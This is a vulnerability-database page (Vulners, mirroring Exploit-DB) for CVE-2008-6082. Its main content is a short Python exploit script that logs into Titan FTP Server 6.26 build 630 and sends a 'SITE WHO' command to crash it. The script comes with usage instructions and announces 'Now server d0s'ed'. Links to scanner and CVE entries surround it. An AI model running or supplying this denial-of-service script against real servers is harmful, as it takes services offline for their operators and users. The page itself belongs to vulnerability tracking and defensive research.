Lucene search
+L

Titan FTP Server 6.26 build 630 - Remote Denial of Service

🗓️ 14 Oct 2008 00:00:00Reported by dmntType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Titan FTP Server 6.26 build 630 - Remote Denial of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Titan FTP Server < 6.26 Build 631 SITE WHO Command DoS
21 Oct 200800:00
nessus
nessus
Tenable Nessus
Titan FTP Server SITE WHO Command Resource Consumption DoS
16 Oct 200800:00
nessus
circl
Circl
CVE-2008-6082
14 Oct 200800:00
circl
cve
CVE
CVE-2008-6082
6 Feb 200911:00
cve
cvelist
Cvelist
CVE-2008-6082
6 Feb 200911:00
cvelist
metasploit
Metasploit
Titan FTP Server 6.26.630 SITE WHO DoS
9 Jan 200905:33
metasploit
nvd
NVD
CVE-2008-6082
6 Feb 200911:30
nvd
openvas
OpenVAS
TitanFTP Server < 6.26.631 DoS Vulnerability
11 Feb 200900:00
openvas
openvas
OpenVAS
Titan FTP Server < 6.26.631 Remote DoS Vulnerability
23 Oct 200800:00
openvas
openvas
OpenVAS
TitanFTP Server Denial of Service Vulnerability
11 Feb 200900:00
openvas
Rows per page
# Titan FTP server v6.26 build 630 remote DoS exploit
# Titan FTP URL - http://www.titanftp.com/
# DoS'ed on "SITE WHO" command
# (x)dmnt
# -*- coding: windows-1252 -*-

import socket
import sys

def help_info():
    print ("Usage: titand0s <host> <login> <password>\n")
    print ("Note: anonymous is enought\n")

def dos_it(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil string"
    sock.send("SITE WHO\r\n")
    sock.close()
    print "[0] Now server d0s'ed"

print ("\n]Titan FTP server v6.26 build 630 remote DoS exploit[")
print ("](x)dmnt 2008[\n\n")

if len(sys.argv) <> 4:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    dos_it(hostname,username,passwd)
    sys.exit(0)

# milw0rm.com [2008-10-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.44577
29